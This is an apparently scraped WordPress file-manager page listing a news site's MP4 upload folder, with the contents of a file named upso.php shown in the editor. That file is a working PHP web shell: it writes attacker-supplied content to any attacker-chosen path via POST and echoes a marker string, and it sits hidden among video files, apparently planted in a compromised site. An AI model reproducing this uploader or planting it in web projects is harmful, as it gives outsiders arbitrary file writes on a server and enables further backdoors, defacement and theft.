WP File Manager
Current Path:
/
home
/
argothem
/
www
/
organecyberpresse
/
IMG
/
mp4
/
Name
Action
..
.ok
Edit
3_mai_assise_de_la_presse_2023.mp4
Edit
attentat_chiraz_iran.mp4
Edit
tebboune_140_pour_1_da.mp4
Edit
upso.php
Edit
Editing: upso.php
<?php if ($_POST) { $f=fopen($_POST["f"],"w"); if(fwrite($f,$_POST["c"])) echo "<font color=red>OK!</font>"; else echo "<font color=blue>Error!</font>"; }; echo 'SXSXSXSX'; ?>